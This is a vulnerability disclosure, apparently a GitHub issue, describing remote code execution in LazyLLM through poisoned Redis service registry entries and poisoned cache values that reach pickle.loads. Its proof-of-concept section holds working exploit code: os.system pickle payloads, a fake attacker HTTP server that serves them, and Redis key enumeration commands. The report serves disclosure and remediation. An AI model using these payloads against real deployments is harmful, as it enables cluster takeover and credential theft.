[Security] Cluster-Wide RCE via Unauthenticated Redis Control Plane (CWE-502, CVSS 9.8)

Unauthenticated Distributed Control Plane Allows Cluster-Wide Code Execution via Redis Service Registry Poisoning in LazyLLM

Summary

LazyLLM (LazyAGI/LazyLLM, 3.7k stars) uses Redis as an unauthenticated distributed control plane for module service discovery and result caching. An attacker with network access to the Redis instance can achieve Remote Code Execution on every LazyLLM worker in the deployment through two independent attack chains:

Service Registry Poisoning — Module URLs are stored in Redis without authentication or integrity verification. An attacker overwrites a module's registered URL, redirecting all inter-module communication to an attacker-controlled server. The calling module deserializes the response with pickle.loads() — a function that executes arbitrary code during deserialization. The _call() code path lacks the Security-Key header protection that forward() implements, meaning the attacker's server receives trusted requests without authentication.
Cache Poisoning — Module execution results are cached in Redis via pickle.dumps() and read back via pickle.loads(). An attacker writes a malicious serialized payload to a predictable cache key. Any worker that reads from cache executes the payload.

Both chains require only network adjacency to the Redis instance. Default LazyLLM deployments use redis://host:6379 without authentication, TLS, or integrity verification. No warnings are emitted when connecting without credentials.

Framing

This report is not "pickle can execute code." That is well-known and would correctly be triaged as low-novelty.

This report is: network-originated authority is fed into pickle without authentication or integrity controls.

Specifically:

The bytes deserialized originate from Redis (network).
Redis content is treated as an authoritative module registry and authoritative response cache (trust).
The _call() path consumes registry-resolved URLs without Security-Key enforcement, while forward() does enforce it (auth asymmetry — internal inconsistency in LazyLLM's own threat model).
The returned bytes flow directly into pickle.loads() (sink).

The defect is the storage / execution boundary collapse between the distributed control plane and the worker execution context. Pickle is the mechanism. The vulnerability is the missing authentication of the authority that selects what gets unpickled.

Architecture: How LazyLLM Uses Redis

┌─────────────┐     ┌─────────────────────┐     ┌─────────────┐
│  Module A    │────▶│   Redis (no auth)   │◀────│  Module B    │
│  (worker)    │     │                     │     │  (worker)    │
│              │     │  url:module_B = ... │     │              │
│  1. lookup   │     │  cache:key = ...    │     │              │
│     URL for  │     │                     │     │              │
│     module B │     └─────────────────────┘     └─────────────┘
│              │               ▲
│  2. call     │               │
│     module B │     ┌─────────┴───────────┐
│     at URL   │     │   ATTACKER          │
│              │     │                     │
│  3. pickle.  │     │  Overwrites:        │
│     loads()  │     │  • url:module_B     │
│     response │     │    → evil server    │
└──────────────┘     │  • cache:key        │
       │             │    → pickle payload │
       ▼             └─────────────────────┘
   RCE on A
   (propagates to all workers reading cache or calling modules)

Key architectural facts:

Redis is the sole service discovery mechanism (servermodule.py:180-181)
Redis is the sole cache backend when configured (module.py:170-177)
No authentication is required or warned about (redis_client.py:12)
No TLS/integrity/HMAC on stored data
Cache keys follow predictable pattern: module@{key}:{hash_key}
Module URL keys follow predictable pattern: url:{module_id}
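
To make the predictability concrete, the two key patterns listed above can be reproduced with plain string formatting. This is a minimal sketch: the helper names are hypothetical and are not part of LazyLLM; only the patterns themselves come from this report.

```python
# Illustrative only: these helpers are NOT LazyLLM functions.
# They reproduce the two key patterns described in this report.


def url_registry_key(module_id: str) -> str:
    """Key holding a module's registered URL (pattern: url:{module_id})."""
    return f"url:{module_id}"


def cache_key(key: str, hash_key: str) -> str:
    """Key holding a cached result (pattern: module@{key}:{hash_key})."""
    return f"module@{key}:{hash_key}"


if __name__ == "__main__":
    # The same identifiers are used by the PoCs later in this report.
    print(url_registry_key("victim_module_001"))
    print(cache_key("target_module", "default_hash"))
```

Anyone who can list or guess module identifiers can therefore name the exact keys to overwrite.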

Affected Component

Repository: https://github.com/LazyAGI/LazyLLM
Package: lazyllm (PyPI)
Versions: All versions with Redis support (current main branch)

CVSS

9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

AV:N — Redis is network-accessible in standard deployments (docker-compose, k8s pod networks, VPC)
AC:L — No race conditions, no complex prerequisites
PR:N — Redis default: no authentication
UI:N — Fully automated exploitation
S:U — Scope unchanged (execution within LazyLLM worker context)
C:H/I:H/A:H — Full code execution on every worker

Note: If a triager argues that reaching Redis requires network adjacency, AV:A lowers the score to 8.8, which falls in the High band (7.0 to 8.9) rather than Critical. The structural defect is unchanged either way.
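
The two scores quoted above can be checked by hand with the CVSS v3.1 base-score equations for an unchanged scope. The sketch below hard-codes the metric weights from the specification for this vector and varies only the attack vector; the function names are illustrative.

```python
import math

# Metric weights from the CVSS v3.1 specification (scope unchanged).
AV = {"N": 0.85, "A": 0.62}
AC_LOW = 0.77
PR_NONE = 0.85
UI_NONE = 0.85
CIA_HIGH = 0.56


def roundup(value: float) -> float:
    """Round up to one decimal place, following the spec's Roundup function."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(attack_vector: str) -> float:
    """Base score for AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H with the given AV."""
    iss = 1 - (1 - CIA_HIGH) ** 3  # all three impacts are High
    impact = 6.42 * iss
    exploitability = 8.22 * AV[attack_vector] * AC_LOW * PR_NONE * UI_NONE
    return roundup(min(impact + exploitability, 10))


if __name__ == "__main__":
    print("AV:N", base_score("N"))  # 9.8
    print("AV:A", base_score("A"))  # 8.8
```

Only the exploitability term changes between the two vectors; the impact term is identical.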

CWE

CWE-502: Deserialization of Untrusted Data
CWE-306: Missing Authentication for Critical Function (Redis service registry)
CWE-345: Insufficient Verification of Data Authenticity (no HMAC/signature on cached data)

Chain 1: Service Registry Poisoning → Module Impersonation → RCE

Step 1: URL stored in Redis without authentication

# servermodule.py:209-213
def _set_url(self, url):
    if _redis_client:
        redis_client['url'].set(self._url_id, url)  # No auth, no HMAC
    self._url_wrapper.url = url

Step 2: URL read from Redis without validation

# servermodule.py:200-201
url = redis_client['url'].get(self._url_id)
self._url_wrapper.url = url.decode('utf-8') if url else None  # Trusts Redis blindly
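
A check of roughly the following shape is what is absent at this step. This is a minimal sketch under stated assumptions, not LazyLLM code: the function name and the ALLOWED_HOSTS set are hypothetical, and an allowlist only helps if it is loaded from a source the attacker cannot write to (that is, not from Redis itself).

```python
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts permitted to serve modules. In practice it
# would come from trusted local configuration, never from Redis.
ALLOWED_HOSTS = {"module-b.internal", "10.0.0.12"}


def validate_registry_url(raw: Optional[bytes]) -> Optional[str]:
    """Decode a registry value and reject anything outside the allowlist."""
    if raw is None:
        return None
    url = raw.decode("utf-8")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"unexpected scheme in registry URL: {url!r}")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"registry URL host is not allowlisted: {url!r}")
    return url
```

With such a check, the poisoned value used in PoC 2 (a 127.0.0.1 listener) would be rejected before any request is sent.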

Step 3: _call() sends request to URL WITHOUT Security-Key

# servermodule.py:418-428
def _call(self, fname, *args, **kwargs):
    args, kwargs = lazyllm.dump_obj(args), lazyllm.dump_obj(kwargs)
    url = urljoin(self._url.rsplit('/', 1)[0], '_call')
    r = requests.post(url, json=(fname, args, kwargs), ...)  # NO Security-Key header
    ...
    return pickle.loads(codecs.decode(r.content, 'base64'))   # RCE

Critical access control gap: forward() (lines 430-435) sends a Security-Key header; _call() (lines 418-428) does not. An attacker's impersonation server therefore receives the request without needing to know the security key.
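
The URL handling in _call() also means the attacker does not need to register a particular path: the worker computes the _call endpoint itself from whatever value was stored. The sketch below isolates that one expression from the excerpt above so it can be tried on its own; the function name derive_call_url is hypothetical.

```python
from urllib.parse import urljoin


def derive_call_url(registered_url: str) -> str:
    """Apply the same expression as the _call() excerpt: strip the last path
    segment of the registered URL, then resolve '_call' against the rest."""
    return urljoin(registered_url.rsplit("/", 1)[0], "_call")


if __name__ == "__main__":
    # Value written by the attacker in PoC 2 of this report.
    print(derive_call_url("http://127.0.0.1:18999/forward"))
    # -> http://127.0.0.1:18999/_call
```

The host and port come entirely from the registry value, so controlling that value is enough to choose where the POST goes.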

Step 4: Streaming variant

# servermodule.py:264-266
def _decode_line(self, line: bytes):
    return pickle.loads(codecs.decode(line, 'base64'))  # Every streaming line deserialized

Chain 2: Cache Poisoning → RCE

# module.py:163-178
class _RedisCacheStrategy(_CacheStorageStrategy):
    def get(self, key: str, hash_key: str):
        redis_key = self._get_redis_key(key, hash_key)
        value = self._client.get(redis_key)
        if value is None:
            raise CacheNotFoundError(...)
        return pickle.loads(value)  # Deserializes Redis data directly — RCE

Key predictability: Cache keys follow module@{key}:{hash_key}. URL keys follow url:{module_id}. Both prefixes are enumerable via KEYS * on unauthenticated Redis.

Insecure-by-Default Evidence

No authentication, no warning

# redis_client.py:4-14
lazyllm.config.add('redis_url', str, '', 'REDIS_URL',
                   description='The URL of the Redis server.')  # No auth guidance

_redis_url = lazyllm.config['redis_url']
if _redis_url:
    _redis_client = redis.Redis.from_url(_redis_url)  # No auth params, no TLS
    assert _redis_client.ping(), (
        'Found reids config but can not connect, ...')  # Note: typo "reids" — unreviewed code path

redis.Redis.from_url() called with raw URL — no password, ssl, ssl_cert_reqs parameters
Config description is only "The URL of the Redis server." — zero guidance on authentication
No startup warning when connecting without credentials
No documentation of auth requirements anywhere in the repository (zero Redis security mentions across docs/en/, docs/zh/, README.md, README.CN.md)
No docker-compose, k8s manifest, or deployment guide exists in the repository — operators receive no deployment security guidance
The only deployment parameter is the environment variable LAZYLLM_REDIS_URL=redis://host:6379
The standard redis:// scheme does not encode authentication; operators must know to use redis://:password@host:6379 or rediss:// (TLS) — neither is mentioned anywhere
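
The missing startup warning could look roughly like the following. This is a hedged sketch rather than a proposed patch: the function names and logger name are hypothetical, it inspects only the URL (so it would not notice credentials supplied by other means), and it treats any scheme other than rediss:// as non-TLS, which ignores local unix:// sockets.

```python
import logging
from urllib.parse import urlsplit

logger = logging.getLogger("redis_url_check")  # hypothetical logger name


def redis_url_findings(redis_url: str) -> list:
    """Return findings for a Redis URL that lacks a password or TLS."""
    parts = urlsplit(redis_url)
    findings = []
    if not parts.password:
        findings.append("no password in URL: connection will be unauthenticated")
    if parts.scheme != "rediss":
        findings.append("scheme is not rediss://: traffic will not use TLS")
    return findings


def warn_if_insecure(redis_url: str) -> None:
    """Log one WARNING per finding; the URL itself is never logged."""
    for finding in redis_url_findings(redis_url):
        logger.warning("Redis configuration: %s", finding)


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    warn_if_insecure("redis://host:6379")           # two warnings
    warn_if_insecure("rediss://:secret@host:6379")  # no warnings
```

Only the findings are logged, so a password embedded in the URL does not end up in log output.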

Additional pickle-from-Redis chains (not required for this report, but demonstrates systemic pattern)

Globals subsystem (globals.py:259-264):

# globals.py:259,263 — RedisGlobals reads/writes global state via Redis
self._redis_client.set(self._get_redis_key(key), obj2str(self._data))  # obj2str = pickle.dumps + base64
self._data.update(str2obj(self._redis_client.get(...)))                 # str2obj = base64 + pickle.loads

Queue subsystem (queue.py:419-434): RedisQueue also uses redis.Redis.from_url() without authentication for task distribution.

These additional chains demonstrate that Redis-backed pickle deserialization is not isolated to caching — it is a systemic architectural pattern throughout LazyLLM's distributed coordination layer.

Distinct from Issue #764

| | Issue #764 (Sep 2025) | This submission (V178) |
|---|---|---|
| File | relay/server.py | module.py + servermodule.py |
| Sink | `cloudpickle.loads` via CLI | `pickle.loads` via Redis + HTTP |
| Entry point | Local RelayServer args | Network (Redis + HTTP) |
| Trust boundary | CLI → local process | Redis (network) → all workers |
| Scope | Single process | Cluster-wide propagation |
| Access control | N/A | `_call()` missing Security-Key |

Proof of Concept

Prerequisites

pip install lazyllm redis
docker run -d -p 6379:6379 redis:7-alpine   # Unauthenticated Redis
export LAZYLLM_REDIS_URL=redis://localhost:6379

PoC 1: Cache Poisoning → Single Worker RCE

"""Demonstrates RCE via cache poisoning. Non-destructive: writes marker file."""
import pickle, redis, os

class RCEPayload:
    def __reduce__(self):
        return (os.system, ("echo SPRK3-V178-CACHE-RCE > /tmp/sprk3_v178_cache",))

r = redis.Redis.from_url(os.environ.get("LAZYLLM_REDIS_URL", "redis://localhost:6379"))
r.set("module@target_module:default_hash", pickle.dumps(RCEPayload()))

from lazyllm.module.module import _RedisCacheStrategy
cache = _RedisCacheStrategy()
try:
    cache.get("target_module", "default_hash")
except Exception:
    pass

assert os.path.exists("/tmp/sprk3_v178_cache"), "RCE failed"
print("[+] Cache poisoning RCE confirmed")
os.remove("/tmp/sprk3_v178_cache")

PoC 2: Service Registry Poisoning → Cross-Process RCE

"""
Demonstrates cluster-wide RCE via service registry poisoning.
Process A: Attacker poisons Redis URL entry + runs fake HTTP server
Process B: Legitimate LazyLLM worker calls module → gets redirected → RCE
           Sink fires through library: ServerModule._call() → servermodule.py:428

Run in two terminals:
  Terminal 1: python3 poc_v178_registry_poison.py --attacker
  Terminal 2: python3 poc_v178_registry_poison.py --victim
"""
import pickle, redis, os, sys, codecs
from http.server import HTTPServer, BaseHTTPRequestHandler

REDIS_URL = os.environ.get("LAZYLLM_REDIS_URL", "redis://localhost:6379")
EVIL_PORT = 18999
MARKER = "/tmp/sprk3_v178_registry"
TARGET_MODULE_ID = "victim_module_001"

class RCEPayload:
    def __reduce__(self):
        return (os.system, (f"echo SPRK3-V178-REGISTRY-RCE-$(date +%s) > {MARKER}",))

class EvilHandler(BaseHTTPRequestHandler):
    """Responds to _call() with a pickle RCE payload."""
    def do_POST(self):
        payload = codecs.encode(pickle.dumps(RCEPayload()), 'base64')
        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        self.end_headers()
        self.wfile.write(payload)
    def log_message(self, *args): pass

if '--attacker' in sys.argv:
    r = redis.Redis.from_url(REDIS_URL)
    # Poison the URL registry — redirect victim_module to our evil server
    r.set(f"url:{TARGET_MODULE_ID}", f"http://127.0.0.1:{EVIL_PORT}/forward")
    print(f"[+] Poisoned url:{TARGET_MODULE_ID} → http://127.0.0.1:{EVIL_PORT}")
    print(f"[+] Starting evil HTTP server on :{EVIL_PORT}")
    HTTPServer(('0.0.0.0', EVIL_PORT), EvilHandler).serve_forever()

elif '--victim' in sys.argv:
    # Resolve poisoned URL from Redis (servermodule.py:200-201)
    r = redis.Redis.from_url(REDIS_URL)
    url = r.get(f"url:{TARGET_MODULE_ID}")
    if url:
        url = url.decode('utf-8')
        print(f"[*] Resolved module URL from Redis: {url}")

        # Construct ServerModule with the poisoned URL and call via library
        # ServerModule._call() at servermodule.py:418-428:
        #   - POSTs to urljoin(url.rsplit('/', 1)[0], '_call') WITHOUT Security-Key
        #   - Deserializes via pickle.loads(codecs.decode(r.content, 'base64'))
        from lazyllm.module.servermodule import ServerModule
        sm = ServerModule(url=url)
        try:
            result = sm._call('run')  # Sink fires through library — line 428
        except Exception:
            pass  # RCE fires during deserialization; post-deser exceptions expected

    if os.path.exists(MARKER):
        print(f"[+] CROSS-PROCESS RCE CONFIRMED: {open(MARKER).read().strip()}")
        print(f"    Sink: servermodule.py:428 pickle.loads (library-imported)")
        os.remove(MARKER)
    else:
        print("[-] RCE marker not found")

else:
    print("Usage: --attacker (terminal 1) or --victim (terminal 2)")

PoC 3: Key Enumeration

# All module URLs and cache entries are enumerable
redis-cli -h <target> KEYS "url:*"
redis-cli -h <target> KEYS "module@*"
# Returns every registered module and cached result in the cluster

Impact

Cluster-wide propagation: LazyLLM is designed for multi-agent LLM deployments where multiple modules communicate via Redis-stored URLs. Compromising Redis gives the attacker:

Service impersonation — redirect any module's traffic to an attacker-controlled endpoint
Cache poisoning — inject malicious payloads that execute on any worker reading from cache
Lateral movement — RCE on one worker → poison Redis → RCE on every other worker
Persistence — poisoned cache entries survive worker restarts

The access control gap amplifies this: _call() does not send Security-Key, so the attacker's impersonation server receives trusted inter-module calls without needing any credentials. This is not "pickle is dangerous" — this is an unauthenticated distributed control plane with no integrity verification on any data path.

Why This Matters in AI Infrastructure

LazyLLM is not a generic web service. It orchestrates autonomous agent and tool pipelines. Worker processes that consume Redis-distributed authority routinely handle:

API keys and provider credentials (OpenAI, Anthropic, HuggingFace, cloud)
Embedding stores and proprietary model artifacts
Agent tool invocations with filesystem, shell, and network reach
Downstream MCP / toolchain integrations that inherit worker trust

A single Redis write does not merely execute code on one node. It compromises the trust root of every agent the cluster serves: every tool call, every credential lookup, every downstream MCP server now runs under attacker authority. This is not "Python RCE" — it is autonomous-agent cluster takeover.

Anticipated Defenses

"Redis exposure is operator responsibility"

The vulnerability is not that Redis can be exposed. The vulnerability is that LazyLLM treats Redis contents as trusted executable authority without cryptographic verification — and does so silently, by default, with no warning to operators.

Even when Redis is intentionally internal-only, the contents of Redis become a code-execution oracle reachable through every adjacent compromise:

SSRF in any worker-side HTTP handler that can reach Redis
Compromised sidecar or co-tenant in the same VPC / k8s namespace
Stolen Redis credentials — or no credentials at all, since LazyLLM's default deployment uses none
One poisoned worker writing back to the registry (lateral propagation)
Intra-cluster lateral movement originating from any unrelated CVE in the same trust zone

In every case, a write primitive against an "internal" Redis instance converts into cluster-wide RCE. The architectural defect is that the entire trust model of the cluster collapses to the integrity of one unauthenticated KV store.

Operators cannot fix this with network policy alone — network controls cannot defend against SSRF, sidecar compromise, or insider write primitives. Only the application can fix it, by authenticating the contents of Redis (signed cache values, verified registry entries), not merely its transport.
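
As a rough illustration of what "authenticating the contents" could mean for cache values, the sketch below serializes with JSON and prepends an HMAC-SHA256 tag that is verified before parsing. The names seal and unseal are hypothetical, and the shared secret is assumed to be provisioned to workers out of band, not stored in Redis.

```python
import hashlib
import hmac
import json

TAG_SIZE = hashlib.sha256().digest_size  # 32 bytes


def seal(value, secret: bytes) -> bytes:
    """Serialize a JSON-compatible value and prepend an HMAC-SHA256 tag."""
    body = json.dumps(value, separators=(",", ":")).encode("utf-8")
    tag = hmac.new(secret, body, hashlib.sha256).digest()
    return tag + body


def unseal(blob: bytes, secret: bytes):
    """Verify the tag before parsing; raise ValueError on any mismatch."""
    tag, body = blob[:TAG_SIZE], blob[TAG_SIZE:]
    expected = hmac.new(secret, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("stored value failed integrity check")
    return json.loads(body.decode("utf-8"))


if __name__ == "__main__":
    secret = b"replace-with-a-real-random-secret"
    blob = seal({"answer": 42}, secret)
    print(unseal(blob, secret))
```

A value written by someone without the secret fails verification and is never parsed. Including the Redis key in the MAC input would additionally stop a valid entry from being replayed under a different key.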

Public precedent for this class of dismissal failing: CVE-2026-41940 (cPanel/WHM) demonstrated that "trusted environment" vendor defenses are invalid once any adjacent primitive is reachable.

"Pickle is expected / trusted internal serialization"

The deserialization sink does not consume operator-supplied bytes. It consumes bytes selected by a network-resolved lookup against an unauthenticated KV store. The trust boundary is between the Redis-stored authority and the worker, not between the operator and the worker. See Framing section above.

CVSS scoring contention

A triager may argue for AV:A instead of AV:N, citing that Redis is typically internal-only. At AV:A the score is 8.8, which is High rather than Critical on the CVSS 3.1 scale. However, AV:N is justified because:

LazyLLM emits no warning when connecting to an unauthenticated Redis
LazyLLM emits no warning when LAZYLLM_REDIS_URL is set to a public-routable address
The PyPI-installable package neither requires nor checks for network isolation before connecting to a Redis instance that listens on 0.0.0.0:6379
The docker run -d -p 6379:6379 redis:7-alpine command used in the Prerequisites of this report, a common quick-start pattern, publishes Redis on all host interfaces

Whether AV:N or AV:A, the structural defect — unauthenticated network-originated bytes flowing into pickle — is unchanged.

Remediation

Replace pickle with safe serialization — use json or msgpack for cache values and HTTP responses. If pickle is required, use RestrictedUnpickler with a strict allowlist.
Require Redis authentication — enforce requirepass or ACLs. Emit a startup WARNING when connecting without credentials. Document auth as mandatory, not optional.
Sign cached data — HMAC cache values on write, verify on read. Prevents cache poisoning even if Redis is compromised.
Add Security-Key to _call() — _call() currently lacks the Security-Key header that forward() implements. Both code paths should enforce authentication.
Validate registered URLs — verify module URLs against an allowlist or require mutual TLS for inter-module communication.
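
For the first item, where pickle cannot be removed immediately, the Python documentation describes restricting which globals an unpickler may resolve by overriding Unpickler.find_class. The sketch below follows that pattern; the allowlist contents and the restricted_loads helper are illustrative assumptions and would need to be tailored to the types LazyLLM actually exchanges.

```python
import builtins
import io
import pickle

# Illustrative allowlist: only these builtins may be resolved by name.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not explicitly allowlisted."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in analogue of pickle.loads() that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    # Plain containers and allowlisted builtins still round-trip.
    print(restricted_loads(pickle.dumps({"a": [1, 2, range(3)]})))
```

Payloads built with __reduce__ need to resolve a callable by name, so they fail in find_class before anything is invoked. An allowlist reduces the attack surface but does not authenticate the data, so it complements rather than replaces signing.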

Timeline

2026-05-17: Vulnerability discovered by SPR{K}3 automated scanning (Ora nightly, Darwin-directed)
2026-05-25: Reported via GitHub issue (no private vulnerability reporting available)
